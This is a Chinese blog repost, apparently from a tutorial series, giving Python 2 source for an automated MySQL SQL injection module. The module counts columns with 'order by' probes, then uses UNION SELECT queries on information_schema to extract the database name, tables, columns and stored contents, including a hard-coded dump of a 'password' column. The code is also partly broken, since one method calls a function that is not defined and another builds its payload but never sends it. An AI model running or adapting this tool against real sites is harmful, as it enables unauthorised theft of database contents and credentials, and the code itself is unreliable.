Python编写SQL注入工具(3)

最新推荐文章于 2023-07-20 17:16:03 发布
最新推荐文章于 2023-07-20 17:16:03 发布
阅读量283 收藏 1
点赞数
文章标签: python 数据库
原文链接:http://www.cnblogs.com/Kerne0/p/4984260.html
版权

Mysql注入模块

#coding:gb2312
import urllib
import string
import binascii
import re

class mysqlInject():
    def __init__(self,url):
        self.db='database()'
        self.url=url  #待检测的网址
        self.dblen=0  #数据库的长度
        self.counts=0 #字段数
        self.tables=[] #
        self.dbname=''

    # 检测数据库的版本
    def judgeVersion(self):
        page=urllib.urlopen(self.url).read()
        sql=string.join([self.url,"%20and%20mid(version(),1,1)=523%"],'')
        pagex=urllib.urlopen(self.url).read()
        if page==pagex:
            print 'MYSQL版本:>5'
        else:
            print 'MYSQL版本<5'

    #检测字段数
    def columnCounts(self):
        page=urllib.urlopen(self.url).read()
        for n in range(1,100):
            sql=string.join([self.url,"%20order%20by%20",str(n)],'')
            pagex=urllib.urlopen(sql).read()
            if n==1:
                if page==pagex:
                    print '可以使用 order by 猜解'
                else:
                    print '不能使用order by 猜解'
                    break
            else:
                if page!=pagex:
                    self.counts=n-1
                    print '字段数:',self.counts
                    break
        if self.counts==0:
            print '未能猜解出字段数!'

    #爆出当前数据库名,数据库用户
    def inject5Content(self,sql):
        url=self.url+'%20and%201=2%20UNION%20SELECT%20'
        for x in range(1,self.counts+1):
            if x!=1:
                url+=','
            url+='concat(0x25,'
            url+=sql
            url+=',0x25)'
        pagec=urllib.urlopen(url).read()
        reg="%[a-z,0-9,A-Z,.,\-,\\,@,:]*%"
        regob = re.compile(reg, re.DOTALL)
        result = regob.findall(pagec)
        if len(result)!=0:
            strings=result[1]
            strings=strings[1:len(strings)-1]
            return strings

    def inject5TableNames(self,DB):
        url=self.url+'%20and%201=2%20UNION%20SELECT%20'
        for x in range(1,self.counts+1):
            if x!=1:
                url+=','
            url+='concat(0x25,'
            url+='group_concat(distinct+table_name)'
            url+=',0x25)'
        url+='%20from%20information_schema.columns%20where%20table_schema='
        url+=DB
        pagec=urllib.urlopen(url).read()
        reg="%[a-z,0-9,A-Z,.,\,,\-,\\,@,:]*%"
        regob = re.compile(reg, re.DOTALL)
        result = regob.findall(pagec)
        if len(result)!=0:
            strings=result[1]
            strings=strings[1:len(strings)-1]
            s=strings.split(',')
            return s

    #猜解字段名
    def inject5ColumnsName(self,TB):
        url=self.url+'%20and%201=2%20UNION%20SELECT%20'
        for x in range(1,self.counts+1):
            if x!=1:
                url+=','
            url+='concat(0x25,'
            url+='group_concat(distinct+column_name)'
            url+=',0x25)'
        url+='%20from%20information_schema.columns%20where%20table_name='
        url+=TB
        pagec=urllib.urlopen(url).read()
        reg="%[a-z,0-9,A-Z,.,\,,\-,\\,@,:]*%"
        regob = re.compile(reg, re.DOTALL)
        result = regob.findall(pagec)
        if len(result)!=0:
            strings=result[1]
            strings=strings[1:len(strings)-1]
            s=strings.split(',')
            return s

    #猜字段内容
    def inject5CountContent(self,TN,CN):
        url=self.url+'%20and%201=2%20UNION%20SELECT%20'
        for x in range(1,self.counts+1):
            if x!=1:
                url+=','
            url+='concat(0x25,'
            url+=CN
            url+=',0x25)'
        url+='%20from%20'
        url+=TN
        pagex=urllib.urlopen(url).read()
        reg="%[a-z,0-9,A-Z,.,\,,\-,\\,@,:]*%"
        regob = re.compile(reg, re.DOTALL)
        result = regob.findall(pagex)
        if len(result)!=0:
            strings=result[1]
            strings=strings[1:len(strings)-1]
            print  CN,':',strings

    #如果数据库的版本大于4,可以使用'查'表的方法注入
    def inject5(self):
        d='database()'
        self.database=self.inject5Content(d)
        print self.database
        database0x=binascii.b2a_hex(self.database)
        database0x='0x'+database0x
        print database0x
        self.inject5TableName(database0x)
        self.inject5TableNames(database0x)
        tb=self.tables[0]
        print ''
        tb=binascii.b2a_hex(tb)
        tb='0x'+tb
        print tb
        self.inject5ColumnsName(tb)
        self.inject5CountContent('gly','password')

 

转载于:https://www.cnblogs.com/Kerne0/p/4984260.html

bangbanji0770
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
如何用python开发自动化SQL注入脚本
haoahaoahaoahao的博客
01-11 2095
当得到数据库名长度后,使用?id=1' and substr(database(),1,1)='字母'--+ 判断数据库名。print("%s数据库共有" % db_name + str(tab_num) + "张表")print("%s表下有%d个字段" % (tab_name, dump_num))# print("第%d的长度为%d"%(i,usn_len))# print("第%d的长度为%d"%(i,usn_len))print("[-]第%d张表名为: %s" % (i, tab_name))
一个简单的sql注入漏洞检测工具
最新发布
m0_63002183的博客
10-08 855
检测完成后,停止进度条的动画,重新启用"开始扫描"按钮,并通过messagebox弹窗展示检测结果。如果存在漏洞,则弹窗显示具体的漏洞类型。定义了几个函数来检测不同类型的SQL注入漏洞,包括布尔盲注、时间盲注、报错注入、UNION联合查询注入和堆叠注入。用户在界面中输入目标URL,然后点击"开始扫描"按钮来检测是否存在SQL注入漏洞。在实际使用中,建议对目标URL进行合法性验证、异常处理等操作,以提高程序的健壮性和安全性。用户在URL输入框中输入目标URL,然后点击"开始扫描"按钮来触发漏洞检测。
Python之SQLMap:自动SQL注入和渗透测试工具示例详解
naer_chongya的博客
07-20 1844
在网络安全领域中,渗透测试是一项重要的任务。其中,SQL注入攻击是最常见的一种攻击方式之一。为了简化渗透测试过程中的繁琐操作,开发者们设计了各种自动化工具。其中,SQLMap是一款使用Python编写的强大工具,用于进行自动化的SQL注入和渗透测试。本文将详细介绍SQLMap的使用方法,包括Python语言环境的搭建、SQLMap的安装和配置、基本使用方法以及具体示例,以帮助读者更好地理解和运用这一强大的工具
sql注入python编程_Python编写SQL注入工具(2)
weixin_39960145的博客
11-30 197
#coding=gb2312importurllibimportstring#定义Access注入函数classAccessInject():def __init__(self,url):self.url=urlself.tableNames=[]self.cloumnNames=[]self.length=0#定义获取表名的函数,使用文件猜解的方式#主要SQL语句:.and exists (se...
sql注入工具的使用
qq_43511094的博客
03-09 4098
关于sql注入工具的使用前言一、超级sql注入工具1、下载地址:2、使用步骤(1).针对于get和post传递的参数进行注册小技巧:(2).针对于http头部进行的注入具体情景(3).最重要的总结二、sqlmap的使用1、前言2、使用方法3、总结 前言 针对于sql注入的练习,目前我已经使用过两种sql注入工具,分别是Sqlmap和超级sql注入,下面将各自介绍一下,我对这两个工具的感受和他们的一些具体用法 提示:以下是本篇文章正文内容,下面案例可供参考 一、超级sql注入工具 1、下载地址: 链接:h
自己动手编写SQL注入漏洞扫描工具
12-31
标题中的“自己动手编写SQL注入漏洞扫描工具”指的是创建一个能够自动检测Web应用程序是否存在SQL注入漏洞的软件。SQL注入是一种常见的网络安全威胁,攻击者通过在输入字段中插入恶意的SQL语句来操纵数据库,获取...
Python实现SQL注入检测插件实例代码
09-19
主要给大家介绍了关于Python实现SQL注入检测插件的相关资料,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧
Python编写SQL注入工具(1)
diaotuanao1650的博客
11-21 605
编写原由:自学了一点SQL注入Python的知识.虽然,早就有了非常好的注入工具Sqlmap,但自己想写一个自动注入的工具玩玩,写的不好之处,还望不吝指正. 第一部分:注入点测试模块(injectTest.py) #coding=gb2312 import urllib import os import string from re import search ...
python安全开发/高级渗透技术
04-15
课程内容包括python语言应用、介绍、开发实例、python gui编程、网络编程、数据库编程、爬虫编程、python开发扫描器、爆炸工具、漏洞利用等,通过本教材的学习,我们可以深入了解最先进的python语言。在语言开发、爬虫工具开发、黑客工具开发等方面。它正在学习python以及网络和信息。安全人员至关重要。
pythonsql注入
love_parents的博客
09-10 3235
转载自: python SQL注入的解决办法 pythonsql注入 背景 APP爆出一个大Bug,只要在查询框内输入“%”,就会检索出所有的数据,最后有人给出了这样的解决方案,在前端进行验证,禁止用户输入“%”之类的特殊字符。 帅呆了!责任轻易地就甩给了前端! 我反问,如果百分号要进行禁止,那么“*&’“()”要不要进行禁止?“desc、select、from”等关键字要不要禁止?还有“+-”,正则表达式相关的符号要不要禁止?就算输入框禁止了,直接发送http请求又如何禁止?
基于pythonsql注入脚本
03-04
适合刚学pythonsql注入的人 import urllib2 import re
python语言编写的DLL注入工具
storm_spirit的博客
05-02 7076
一、流程 1、第一步,获取要注入进程快照; 2、第二步,在快照中比对进程名,得到进程PID; 3、第三步,用pid去打开进程获取到句柄; 4、第四步,在要注入的进程内申请一块内存; 5、第五步,把要注入的dll路径写入进程内存中; 6、第六步,得到“LoadLibraryA”函数的句柄 7、第七步,通过远程线程运行注入的dll,注入成功 二、代码 #-*- coding: ut...
Python安全之编写SQL注入漏洞利用脚本(EXP)
gaojian5422的博客
02-28 1477
本例中以靶机DVWA中的盲注为例。
pythonsql注入步骤_python 打造一个sql注入脚本 (一)
weixin_39809168的博客
11-30 503
0x00前言:昨天刚刚看完小迪老师的sql注入篇的第一章所以有了新的笔记。0x01笔记:sql注入原理:网站数据传输中,接受变量传递的值未进行过滤,导致直接带入数据库查询执行的操作。sql注入对渗透的作用:获取数据sql注入特性:攻击方法由数据库类型决定攻击结果由数据库决定漏洞代码:sql.php当我们在网页执行访问了:http://127.0.0.1/sql.php?x=1在数据库其实是这样的$...
python预防sql注入
06-01
SQL注入是一种常见的Web安全漏洞,攻击者可以利用这种漏洞来获取、修改或者删除数据库...总之,预防SQL注入攻击是Web开发中非常重要的一项工作,开发者应该注意编写安全的代码,避免恶意用户利用SQL注入漏洞攻击网站。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值